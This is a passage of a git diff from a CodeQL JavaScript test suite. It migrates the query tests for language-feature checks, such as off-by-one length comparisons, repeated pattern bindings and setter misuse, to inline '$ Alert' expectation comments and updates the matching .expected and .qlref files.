console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected index 0c03a59fd223..e2aa2ed56f3e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected @@ -1,2 +1,2 @@ -| m.js:1:8:1:22 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | -| tst.js:1:1:1:22 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | +| m.js:1:8:1:33 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | +| tst.js:1:1:1:33 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref index 8c5695ffb85c..a03be885e21c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref @@ -1 +1,2 @@ -LanguageFeatures/InconsistentNew.ql \ No newline at end of file +query: LanguageFeatures/InconsistentNew.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js index 416caeb40635..1bc9fbf5f537 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js @@ -1,3 +1,3 @@ -export function A(x) { +export function A(x) { // $ Alert this.x = x; }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..fb22e98ade67 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js @@ -1,4 +1,4 @@ -function Point(x, y) { +function Point(x, y) { // $ Alert this.x = x; this.y = y; } @@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref index 04e81233ed77..307244114cbc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref @@ -1 +1,2 @@ -LanguageFeatures/InvalidPrototype.ql \ No newline at end of file +query: LanguageFeatures/InvalidPrototype.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref index f76a131eff46..6404cd83590e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref @@ -1 +1,2 @@ -LanguageFeatures/JumpFromFinally.ql \ No newline at end of file +query: LanguageFeatures/JumpFromFinally.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js index 0cf40521ad93..d875f1c1d03e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js @@ -4,7 +4,7 @@ function foo(resource) { throw new Error(); } finally { resource.close(); - return true; + return true; // $ Alert } } @@ -25,7 +25,7 @@ function baz(resource) { throw new Error(); } finally { resource.close(); - break; + break; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected @@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref index 4b12bd2f70ba..2514b6d76698 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref @@ -1 +1,2 @@ -LanguageFeatures/LengthComparisonOffByOne.ql \ No newline at end of file +query: LanguageFeatures/LengthComparisonOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..6b214c9b0423 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { - for (let i = 0; i <= a.length; ++i) +function badContains(a, elt) { // incorrect upper bound + for (let i = 0; i <= a.length; ++i) // $ Alert if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) @@ -48,12 +43,12 @@ function goodContains(a, elt) { // this is arguably OK, but we flag it function same(a, b) { for (var i=0; i < a.length || i < b.length ; ++i) - if (i <= a.length && i <= b.length && a[i] !== b[i]) + if (i <= a.length && i <= b.length && a[i] !== b[i]) // $ Alert return false; return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..31d9fc228113 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected @@ -1,11 +1,11 @@ | NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref index 322a10d00085..5684a790f6cc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref @@ -1 +1,2 @@ -LanguageFeatures/NonLinearPattern.ql \ No newline at end of file +query: LanguageFeatures/NonLinearPattern.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts index d19e8bb327fc..2ff108ddb8a1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts @@ -1,3 +1,3 @@ -function distance({x: number, y: number}) { +function distance({x: number, y: number}) { // $ Alert return Math.sqrt(x*x + y*y); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js @@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref index f57cf67c800c..6dccd34408b6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref @@ -1 +1,2 @@ -LanguageFeatures/PropertyWriteOnPrimitive.ql \ No newline at end of file +query: LanguageFeatures/PropertyWriteOnPrimitive.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref index 2419fbd90b9b..b84aceb435ad 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref @@ -1 +1,2 @@ -LanguageFeatures/SemicolonInsertion.ql +query: LanguageFeatures/SemicolonInsertion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js index 7e06517fe174..4c95a6eb67dc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js @@ -2,7 +2,7 @@ export default function f() { return 23; } -export var x = 42 +export var x = 42 // $ Alert //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js index 5e9b07cf6757..6f125751c3a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js @@ -1,6 +1,6 @@ function window::onload() {} -window.onload = function onload() {} +window.onload = function onload() {} // $ Alert // pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..3c296665f301 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js @@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { 'i': 1, 'j': 2 - } + } // $ Alert - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..e49869816edf 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:23 | set x(v ... ert\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref index c5e101163a52..f090c96c40ce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterIgnoresParameter.ql \ No newline at end of file +query: LanguageFeatures/SetterIgnoresParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..58682204ca5f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,27 +5,26 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, get x() { return _x; }, - set x(v) { - // NOT OK + set x(v) { // $ Alert }, get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref index 93a02072150c..0c6e38131cc4 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterReturn.ql \ No newline at end of file +query: LanguageFeatures/SetterReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected index 